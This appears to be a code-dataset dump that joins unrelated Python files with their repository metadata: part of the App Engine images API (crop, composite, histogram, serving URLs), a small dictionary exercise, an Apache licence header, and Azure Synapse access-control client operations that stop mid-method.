right_x: float value between 0.0 and 1.0 (inclusive).
bottom_y: float value between 0.0 and 1.0 (inclusive).
Raises:
TypeError if the args are not of type 'float'.
BadRequestError when there is something wrong with the given bounding box
or if MAX_TRANSFORMS_PER_REQUEST transforms have already been requested
for this image.
"""
self._validate_crop_arg(left_x, "left_x")
self._validate_crop_arg(top_y, "top_y")
self._validate_crop_arg(right_x, "right_x")
self._validate_crop_arg(bottom_y, "bottom_y")
if left_x >= right_x:
raise BadRequestError("left_x must be less than right_x")
if top_y >= bottom_y:
raise BadRequestError("top_y must be less than bottom_y")
self._check_transform_limits()
transform = images_service_pb.Transform()
transform.set_crop_left_x(left_x)
transform.set_crop_top_y(top_y)
transform.set_crop_right_x(right_x)
transform.set_crop_bottom_y(bottom_y)
self._transforms.append(transform)
def im_feeling_lucky(self):
"""Automatically adjust image contrast and color levels.
This is similar to the "I'm Feeling Lucky" button in Picasa.
Raises:
BadRequestError if MAX_TRANSFORMS_PER_REQUEST transforms have already
been requested for this image.
"""
self._check_transform_limits()
transform = images_service_pb.Transform()
transform.set_autolevels(True)
self._transforms.append(transform)
def _set_imagedata(self, imagedata):
"""Fills in an ImageData PB from this Image instance.
Args:
imagedata: An ImageData PB instance
"""
if self._blob_key:
imagedata.set_content("")
imagedata.set_blob_key(self._blob_key)
else:
imagedata.set_content(self._image_data)
def execute_transforms(self, output_encoding=PNG, quality=None):
"""Perform transformations on given image.
Args:
output_encoding: A value from OUTPUT_ENCODING_TYPES.
quality: A value between 1 and 100 to specify the quality of the
encoding. This value is only used for JPEG quality control.
Returns:
str, image data after the transformations have been performed on it.
Raises:
BadRequestError when there is something wrong with the request
specifications.
NotImageError when the image data given is not an image.
BadImageError when the image data given is corrupt.
LargeImageError when the image data given is too large to process.
InvalidBlobKeyError when the blob key provided is invalid.
      TransformationError when an error occurs during image manipulation.
Error when something unknown, but bad, happens.
"""
if output_encoding not in OUTPUT_ENCODING_TYPES:
raise BadRequestError("Output encoding type not in recognized set "
"%s" % OUTPUT_ENCODING_TYPES)
if not self._transforms:
raise BadRequestError("Must specify at least one transformation.")
if quality is not None:
if not isinstance(quality, (int, long)):
raise TypeError("Quality must be an integer.")
if quality > 100 or quality < 1:
raise BadRequestError("Quality must be between 1 and 100.")
request = images_service_pb.ImagesTransformRequest()
response = images_service_pb.ImagesTransformResponse()
self._set_imagedata(request.mutable_image())
for transform in self._transforms:
request.add_transform().CopyFrom(transform)
request.mutable_output().set_mime_type(output_encoding)
if ((output_encoding == JPEG) and
(quality is not None)):
request.mutable_output().set_quality(quality)
try:
apiproxy_stub_map.MakeSyncCall("images",
"Transform",
request,
response)
except apiproxy_errors.ApplicationError, e:
if (e.application_error ==
images_service_pb.ImagesServiceError.BAD_TRANSFORM_DATA):
raise BadRequestError()
elif (e.application_error ==
images_service_pb.ImagesServiceError.NOT_IMAGE):
raise NotImageError()
elif (e.application_error ==
images_service_pb.ImagesServiceError.BAD_IMAGE_DATA):
raise BadImageError()
elif (e.application_error ==
images_service_pb.ImagesServiceError.IMAGE_TOO_LARGE):
raise LargeImageError()
elif (e.application_error ==
images_service_pb.ImagesServiceError.INVALID_BLOB_KEY):
raise InvalidBlobKeyError()
elif (e.application_error ==
images_service_pb.ImagesServiceError.UNSPECIFIED_ERROR):
raise TransformationError()
else:
raise Error()
self._image_data = response.image().content()
self._blob_key = None
self._transforms = []
self._width = None
self._height = None
return self._image_data
@property
def width(self):
"""Gets the width of the image."""
if self._width is None:
self._update_dimensions()
return self._width
@property
def height(self):
"""Gets the height of the image."""
if self._height is None:
self._update_dimensions()
return self._height
def histogram(self):
"""Calculates the histogram of the image.
    Returns: 3 256-element lists containing the number of occurrences of each
value of each color in the order RGB. As described at
http://en.wikipedia.org/wiki/Color_histogram for N = 256. i.e. the first
value of the first list contains the number of pixels with a red value of
0, the second the number with a red value of 1.
Raises:
NotImageError when the image data given is not an image.
BadImageError when the image data given is corrupt.
LargeImageError when the image data given is too large to process.
Error when something unknown, but bad, happens.
"""
request = images_service_pb.ImagesHistogramRequest()
response = images_service_pb.ImagesHistogramResponse()
self._set_imagedata(request.mutable_image())
try:
apiproxy_stub_map.MakeSyncCall("images",
"Histogram",
request,
response)
except apiproxy_errors.ApplicationError, e:
if (e.application_error ==
images_service_pb.ImagesServiceError.NOT_IMAGE):
raise NotImageError()
elif (e.application_error ==
images_service_pb.ImagesServiceError.BAD_IMAGE_DATA):
raise BadImageError()
elif (e.application_error ==
images_service_pb.ImagesServiceError.IMAGE_TOO_LARGE):
raise LargeImageError()
elif (e.application_error ==
images_service_pb.ImagesServiceError.INVALID_BLOB_KEY):
raise InvalidBlobKeyError()
else:
raise Error()
histogram = response.histogram()
return [histogram.red_list(),
histogram.green_list(),
histogram.blue_list()]
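# Minimal Image-class sketch (assumes `image_data` holds the raw bytes of an
# uploaded image; transforms are queued and only applied by execute_transforms()):
#
#   img = Image(image_data)
#   img.resize(width=200)
#   img.im_feeling_lucky()
#   png_bytes = img.execute_transforms(output_encoding=PNG)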
def resize(image_data, width=0, height=0, output_encoding=PNG):
"""Resize a given image file maintaining the aspect ratio.
If both width and height are specified, the more restricting of the two
values will be used when resizing the photo. The maximum dimension allowed
for both width and height is 4000 pixels.
Args:
image_data: str, source image data.
width: int, width (in pixels) to change the image width to.
height: int, height (in pixels) to change the image height to.
output_encoding: a value from OUTPUT_ENCODING_TYPES.
Raises:
    TypeError when width or height is not either 'int' or 'long' types.
BadRequestError when there is something wrong with the given height or
width.
Error when something went wrong with the call. See Image.ExecuteTransforms
for more details.
"""
image = Image(image_data)
image.resize(width, height)
return image.execute_transforms(output_encoding=output_encoding)
def rotate(image_data, degrees, output_encoding=PNG):
"""Rotate a given image a given number of degrees clockwise.
Args:
image_data: str, source image data.
    degrees: int, must be a multiple of 90.
output_encoding: a value from OUTPUT_ENCODING_TYPES.
Raises:
TypeError when degrees is not either 'int' or 'long' types.
BadRequestError when there is something wrong with the given degrees.
Error when something went wrong with the call. See Image.ExecuteTransforms
for more details.
"""
image = Image(image_data)
image.rotate(degrees)
return image.execute_transforms(output_encoding=output_encoding)
def horizontal_flip(image_data, output_encoding=PNG):
"""Flip the image horizontally.
Args:
image_data: str, source image data.
output_encoding: a value from OUTPUT_ENCODING_TYPES.
Raises:
Error when something went wrong with the call. See Image.ExecuteTransforms
for more details.
"""
image = Image(image_data)
image.horizontal_flip()
return image.execute_transforms(output_encoding=output_encoding)
def vertical_flip(image_data, output_encoding=PNG):
"""Flip the image vertically.
Args:
image_data: str, source image data.
output_encoding: a value from OUTPUT_ENCODING_TYPES.
Raises:
Error when something went wrong with the call. See Image.ExecuteTransforms
for more details.
"""
image = Image(image_data)
image.vertical_flip()
return image.execute_transforms(output_encoding=output_encoding)
def crop(image_data, left_x, top_y, right_x, bottom_y, output_encoding=PNG):
"""Crop the given image.
The four arguments are the scaling numbers to describe the bounding box
which will crop the image. The upper left point of the bounding box will
be at (left_x*image_width, top_y*image_height) the lower right point will
be at (right_x*image_width, bottom_y*image_height).
Args:
image_data: str, source image data.
left_x: float value between 0.0 and 1.0 (inclusive).
top_y: float value between 0.0 and 1.0 (inclusive).
right_x: float value between 0.0 and 1.0 (inclusive).
bottom_y: float value between 0.0 and 1.0 (inclusive).
output_encoding: a value from OUTPUT_ENCODING_TYPES.
Raises:
TypeError if the args are not of type 'float'.
BadRequestError when there is something wrong with the given bounding box.
Error when something went wrong with the call. See Image.ExecuteTransforms
for more details.
"""
image = Image(image_data)
image.crop(left_x, top_y, right_x, bottom_y)
return image.execute_transforms(output_encoding=output_encoding)
def im_feeling_lucky(image_data, output_encoding=PNG):
"""Automatically adjust image levels.
This is similar to the "I'm Feeling Lucky" button in Picasa.
Args:
image_data: str, source image data.
output_encoding: a value from OUTPUT_ENCODING_TYPES.
Raises:
Error when something went wrong with the call. See Image.ExecuteTransforms
for more details.
"""
image = Image(image_data)
image.im_feeling_lucky()
return image.execute_transforms(output_encoding=output_encoding)
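# Minimal sketch for the one-shot helpers above (assumes `image_data` holds raw
# image bytes; each call builds an Image, applies a single transform and returns
# the re-encoded bytes, PNG by default):
#
#   thumbnail = resize(image_data, width=120, height=120)
#   rotated = rotate(image_data, 90)
#   cropped = crop(image_data, 0.0, 0.0, 0.5, 0.5, output_encoding=JPEG)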
def composite(inputs, width, height, color=0, output_encoding=PNG, quality=None):
"""Composite one or more images onto a canvas.
Args:
inputs: a list of tuples (image_data, x_offset, y_offset, opacity, anchor)
where
image_data: str, source image data.
x_offset: x offset in pixels from the anchor position
      y_offset: y offset in pixels from the anchor position
opacity: opacity of the image specified as a float in range [0.0, 1.0]
      anchor: anchoring point from ANCHOR_TYPES. The anchor point of the image
is aligned with the same anchor point of the canvas. e.g. TOP_RIGHT would
place the top right corner of the image at the top right corner of the
canvas then apply the x and y offsets.
width: canvas width in pixels.
height: canvas height in pixels.
color: canvas background color encoded as a 32 bit unsigned int where each
color channel is represented by one byte in order ARGB.
output_encoding: a value from OUTPUT_ENCODING_TYPES.
quality: A value between 1 and 100 to specify the quality of the
encoding. This value is only used for JPEG quality control.
Returns:
str, image data of the composited image.
Raises:
TypeError If width, height, color, x_offset or y_offset are not of type
int or long or if opacity is not a float
BadRequestError If more than MAX_TRANSFORMS_PER_REQUEST compositions have
been requested, if the canvas width or height is greater than 4000 or less
than or equal to 0, if the color is invalid or if for any composition
option, the opacity is outside the range [0,1] or the anchor is invalid.
"""
if (not isinstance(width, (int, long)) or
not isinstance(height, (int, long)) or
not isinstance(color, (int, long))):
raise TypeError("Width, height and color must be integers.")
if output_encoding not in OUTPUT_ENCODING_TYPES:
raise BadRequestError("Output encoding type '%s' not in recognized set "
"%s" % (output_encoding, OUTPUT_ENCODING_TYPES))
if quality is not None:
if not isinstance(quality, (int, long)):
raise TypeError("Quality must be an integer.")
if quality > 100 or quality < 1:
raise BadRequestError("Quality must be between 1 and 100.")
if not inputs:
raise BadRequestError("Must provide at least one input")
if len(inputs) > MAX_COMPOSITES_PER_REQUEST:
raise BadRequestError("A maximum of %d composition operations can be"
"performed in a single request" %
MAX_COMPOSITES_PER_REQUEST)
if width <= 0 or height <= 0:
raise BadRequestError("Width and height must be > 0.")
if width > 4000 or height > 4000:
raise BadRequestError("Width and height must be <= 4000.")
if color > 0xffffffff or color < 0:
raise BadRequestError("Invalid color")
if color >= 0x80000000:
color -= 0x100000000
image_map = {}
request = images_service_pb.ImagesCompositeRequest()
response = images_service_pb.ImagesTransformResponse()
for (image, x, y, opacity, anchor) in inputs:
if not image:
raise BadRequestError("Each input must include an image")
if (not isinstance(x, (int, long)) or
not isinstance(y, (int, long)) or
not isinstance(opacity, (float))):
raise TypeError("x_offset, y_offset must be integers and opacity must"
"be a float")
if x > 4000 or x < -4000:
raise BadRequestError("xOffsets must be in range [-4000, 4000]")
if y > 4000 or y < -4000:
raise BadRequestError("yOffsets must be in range [-4000, 4000]")
if opacity < 0 or opacity > 1:
raise BadRequestError("Opacity must be in the range 0.0 to 1.0")
if anchor not in ANCHOR_TYPES:
raise BadRequestError("Anchor type '%s' not in recognized set %s" %
(anchor, ANCHOR_TYPES))
if image not in image_map:
image_map[image] = request.image_size()
if isinstance(image, Image):
image._set_imagedata(request.add_image())
else:
request.add_image().set_content(image)
option = request.add_options()
option.set_x_offset(x)
option.set_y_offset(y)
option.set_opacity(opacity)
option.set_anchor(anchor)
option.set_source_index(image_map[image])
request.mutable_canvas().mutable_output().set_mime_type(output_encoding)
request.mutable_canvas().set_width(width)
request.mutable_canvas().set_height(height)
request.mutable_canvas().set_color(color)
if ((output_encoding == JPEG) and
(quality is not None)):
request.mutable_canvas().mutable_output().set_quality(quality)
try:
apiproxy_stub_map.MakeSyncCall("images",
"Composite",
request,
response)
except apiproxy_errors.ApplicationError, e:
if (e.application_error ==
images_service_pb.ImagesServiceError.BAD_TRANSFORM_DATA):
raise BadRequestError()
elif (e.application_error ==
images_service_pb.ImagesServiceError.NOT_IMAGE):
raise NotImageError()
elif (e.application_error ==
images_service_pb.ImagesServiceError.BAD_IMAGE_DATA):
raise BadImageError()
elif (e.application_error ==
images_service_pb.ImagesServiceError.IMAGE_TOO_LARGE):
raise LargeImageError()
elif (e.application_error ==
images_service_pb.ImagesServiceError.INVALID_BLOB_KEY):
raise InvalidBlobKeyError()
elif (e.application_error ==
images_service_pb.ImagesServiceError.UNSPECIFIED_ERROR):
raise TransformationError()
else:
raise Error()
return response.image().content()
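# Minimal composite() sketch (assumes `photo_data` and `logo_data` are image byte
# strings; offsets are measured from the chosen anchor corner and the color is a
# 32-bit ARGB value, here opaque black):
#
#   result = composite(
#       [(photo_data, 0, 0, 1.0, TOP_LEFT),
#        (logo_data, -10, -10, 0.5, BOTTOM_RIGHT)],
#       width=800, height=600, color=0xFF000000,
#       output_encoding=JPEG, quality=85)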
def histogram(image_data):
"""Calculates the histogram of the given image.
Args:
image_data: str, source image data.
  Returns: 3 256-element lists containing the number of occurrences of each
value of each color in the order RGB.
Raises:
NotImageError when the image data given is not an image.
BadImageError when the image data given is corrupt.
LargeImageError when the image data given is too large to process.
Error when something unknown, but bad, happens.
"""
image = Image(image_data)
return image.histogram()
IMG_SERVING_SIZES_LIMIT = 1600
IMG_SERVING_SIZES = [
32, 48, 64, 72, 80, 90, 94, 104, 110, 120, 128, 144,
150, 160, 200, 220, 288, 320, 400, 512, 576, 640, 720,
800, 912, 1024, 1152, 1280, 1440, 1600]
IMG_SERVING_CROP_SIZES = [32, 48, 64, 72, 80, 104, 136, 144, 150, 160]
def get_serving_url(blob_key,
size=None,
crop=False):
"""Obtain a url that will serve the underlying image.
This URL is served by a high-performance dynamic image serving infrastructure.
This URL format also allows dynamic resizing and crop with certain
restrictions. To get dynamic resizing and cropping, specify size and crop
arguments, or simply append options to the end of the default url obtained via
this call. Here is an example:
get_serving_url -> "http://lh3.ggpht.com/SomeCharactersGoesHere"
To get a 32 pixel sized version (aspect-ratio preserved) simply append
"=s32" to the url:
"http://lh3.ggpht.com/SomeCharactersGoesHere=s32"
To get a 32 pixel cropped version simply append "=s32-c":
"http://lh3.ggpht.com/SomeCharactersGoesHere=s32-c"
  Available sizes are any integer in the range [0, 1600]; the upper limit is available as
IMG_SERVING_SIZES_LIMIT.
Args:
size: int, size of resulting images
crop: bool, True requests a cropped image, False a resized one.
Returns:
str, a url
Raises:
BlobKeyRequiredError: when no blobkey was specified in the ctor.
UnsupportedSizeError: when size parameters uses unsupported sizes.
BadRequestError: when crop/size are present in wrong combination.
"""
if not blob_key:
raise BlobKeyRequiredError("A Blobkey is required for this operation.")
if crop and not size:
raise BadRequestError("Size should be set for crop operation")
if size and (size > IMG_SERVING_SIZES_LIMIT or size < 0):
raise UnsupportedSizeError("Unsupported size")
request = images_service_pb.ImagesGetUrlBaseRequest()
response = images_service_pb.ImagesGetUrlBaseResponse()
request.set_blob_key(blob_key)
try:
apiproxy_stub_map.MakeSyncCall("images",
"GetUrlBase",
request,
response)
except apiproxy_errors.ApplicationError, e:
if (e.application_error ==
images_service_pb.ImagesServiceError.NOT_IMAGE):
raise NotImageError()
elif (e.application_error ==
images_service_pb.ImagesServiceError.BAD_IMAGE_DATA):
raise BadImageError()
elif (e.application_error ==
images_service_pb.ImagesServiceError.IMAGE_TOO_LARGE):
raise LargeImageError()
elif (e.application_error ==
images_service_pb.ImagesServiceError.INVALID_BLOB_KEY):
raise InvalidBlobKeyError()
else:
raise Error()
url = response.url()
if size:
url += "=s%s" % size
if crop:
url += "-c"
return url
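# Minimal get_serving_url() sketch (assumes `blob_key` refers to an image blob
# already stored in the blobstore; the "=s200-c" suffix mirrors the size/crop
# options described in the docstring above):
#
#   url = get_serving_url(blob_key, size=200, crop=True)
#   # e.g. "http://lh3.ggpht.com/SomeCharactersGoesHere=s200-c"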
| 34.9909
| 81
| 0.683408
|
cb86844490805357512bf0f15acfbb8e8a019e8e
| 225
|
py
|
Python
|
Programming Languages/Python/Theory/100_Python_Exercises/Exercises/Exercise 24/24.py
|
jaswinder9051998/Resources
|
fd468af37bf24ca57555d153ee64693c018e822e
|
[
"MIT"
] | 101
|
2021-12-20T11:57:11.000Z
|
2022-03-23T09:49:13.000Z
|
50-Python-Exercises/Exercises/Exercise 24/24.py
|
kuwarkapur/Hacktoberfest-2022
|
efaafeba5ce51d8d2e2d94c6326cc20bff946f17
|
[
"MIT"
] | 4
|
2022-01-12T11:55:56.000Z
|
2022-02-12T04:53:33.000Z
|
50-Python-Exercises/Exercises/Exercise 24/24.py
|
kuwarkapur/Hacktoberfest-2022
|
efaafeba5ce51d8d2e2d94c6326cc20bff946f17
|
[
"MIT"
] | 38
|
2022-01-12T11:56:16.000Z
|
2022-03-23T10:07:52.000Z
|
#Complete the script so it prints out the expected output
d = dict(a = list(range(1, 11)), b = list(range(11, 21)), c = list(range(21, 31)))
print(d.items())
for key, value in d.items():
print(key, "has value", value)
| 25
| 82
| 0.64
|
bfe01c3332b83459fe6d42bc4931ef5ad2855b92
| 633
|
py
|
Python
|
hammr/__init__.py
|
MaxTakahashi/hammr
|
cfe593ccfdddb7f98185e561feed6a40a866b585
|
[
"Apache-2.0"
] | null | null | null |
hammr/__init__.py
|
MaxTakahashi/hammr
|
cfe593ccfdddb7f98185e561feed6a40a866b585
|
[
"Apache-2.0"
] | null | null | null |
hammr/__init__.py
|
MaxTakahashi/hammr
|
cfe593ccfdddb7f98185e561feed6a40a866b585
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2007-2015 UShareSoft SAS, All rights reserved
#
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
| 45.214286
| 78
| 0.731438
|
020843088f6293c261fb21ef6b97446c7e3a4e6f
| 20,523
|
py
|
Python
|
sdk/synapse/azure-synapse-accesscontrol/azure/synapse/accesscontrol/operations/_access_control_client_operations.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 2,728
|
2015-01-09T10:19:32.000Z
|
2022-03-31T14:50:33.000Z
|
sdk/synapse/azure-synapse-accesscontrol/azure/synapse/accesscontrol/operations/_access_control_client_operations.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 17,773
|
2015-01-05T15:57:17.000Z
|
2022-03-31T23:50:25.000Z
|
sdk/synapse/azure-synapse-accesscontrol/azure/synapse/accesscontrol/operations/_access_control_client_operations.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 1,916
|
2015-01-19T05:05:41.000Z
|
2022-03-31T19:36:44.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from .. import models as _models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, List, Optional, TypeVar
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class AccessControlClientOperationsMixin(object):
def get_role_definitions(
self,
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.RolesListResponse"]
"""List roles.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either RolesListResponse or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.synapse.accesscontrol.models.RolesListResponse]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.RolesListResponse"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-02-01-preview"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.get_role_definitions.metadata['url'] # type: ignore
path_format_arguments = {
'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
path_format_arguments = {
'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('RolesListResponse', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize(_models.ErrorContract, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
get_role_definitions.metadata = {'url': '/rbac/roles'} # type: ignore
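    # Minimal usage sketch (assumes `client` is an authenticated AccessControlClient
    # created for a Synapse workspace endpoint; the returned ItemPaged yields the
    # items of each page's `value` list and follows the next link transparently):
    #
    #   for role in client.get_role_definitions():
    #       print(role)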
def get_role_definition_by_id(
self,
role_id, # type: str
**kwargs # type: Any
):
# type: (...) -> "_models.SynapseRole"
"""Get role by role Id.
:param role_id: Synapse Built-In Role Id.
:type role_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: SynapseRole, or the result of cls(response)
:rtype: ~azure.synapse.accesscontrol.models.SynapseRole
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.SynapseRole"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-02-01-preview"
accept = "application/json"
# Construct URL
url = self.get_role_definition_by_id.metadata['url'] # type: ignore
path_format_arguments = {
'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
'roleId': self._serialize.url("role_id", role_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.ErrorContract, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('SynapseRole', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_role_definition_by_id.metadata = {'url': '/rbac/roles/{roleId}'} # type: ignore
def create_role_assignment(
self,
create_role_assignment_options, # type: "_models.RoleAssignmentOptions"
**kwargs # type: Any
):
# type: (...) -> "_models.RoleAssignmentDetails"
"""Create role assignment.
:param create_role_assignment_options: Details of role id and object id.
:type create_role_assignment_options: ~azure.synapse.accesscontrol.models.RoleAssignmentOptions
:keyword callable cls: A custom type or function that will be passed the direct response
:return: RoleAssignmentDetails, or the result of cls(response)
:rtype: ~azure.synapse.accesscontrol.models.RoleAssignmentDetails
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.RoleAssignmentDetails"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-02-01-preview"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.create_role_assignment.metadata['url'] # type: ignore
path_format_arguments = {
'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(create_role_assignment_options, 'RoleAssignmentOptions')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.ErrorContract, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('RoleAssignmentDetails', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_role_assignment.metadata = {'url': '/rbac/roleAssignments'} # type: ignore
def get_role_assignments(
self,
role_id=None, # type: Optional[str]
principal_id=None, # type: Optional[str]
continuation_token_parameter=None, # type: Optional[str]
**kwargs # type: Any
):
# type: (...) -> List["_models.RoleAssignmentDetails"]
"""List role assignments.
:param role_id: Synapse Built-In Role Id.
:type role_id: str
:param principal_id: Object ID of the AAD principal or security-group.
:type principal_id: str
:param continuation_token_parameter: Continuation token.
:type continuation_token_parameter: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: list of RoleAssignmentDetails, or the result of cls(response)
:rtype: list[~azure.synapse.accesscontrol.models.RoleAssignmentDetails]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[List["_models.RoleAssignmentDetails"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-02-01-preview"
accept = "application/json"
# Construct URL
url = self.get_role_assignments.metadata['url'] # type: ignore
path_format_arguments = {
'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if role_id is not None:
query_parameters['roleId'] = self._serialize.query("role_id", role_id, 'str')
if principal_id is not None:
query_parameters['principalId'] = self._serialize.query("principal_id", principal_id, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if continuation_token_parameter is not None:
header_parameters['x-ms-continuation'] = self._serialize.header("continuation_token_parameter", continuation_token_parameter, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.ErrorContract, response)
raise HttpResponseError(response=response, model=error)
response_headers = {}
response_headers['x-ms-continuation']=self._deserialize('str', response.headers.get('x-ms-continuation'))
deserialized = self._deserialize('[RoleAssignmentDetails]', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, response_headers)
return deserialized
get_role_assignments.metadata = {'url': '/rbac/roleAssignments'} # type: ignore
def get_role_assignment_by_id(
self,
role_assignment_id, # type: str
**kwargs # type: Any
):
# type: (...) -> "_models.RoleAssignmentDetails"
"""Get role assignment by role assignment Id.
:param role_assignment_id: The ID of the role assignment.
:type role_assignment_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: RoleAssignmentDetails, or the result of cls(response)
:rtype: ~azure.synapse.accesscontrol.models.RoleAssignmentDetails
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.RoleAssignmentDetails"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-02-01-preview"
accept = "application/json"
# Construct URL
url = self.get_role_assignment_by_id.metadata['url'] # type: ignore
path_format_arguments = {
'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
'roleAssignmentId': self._serialize.url("role_assignment_id", role_assignment_id, 'str', min_length=1),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.ErrorContract, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('RoleAssignmentDetails', pipeline_response)
if cls:
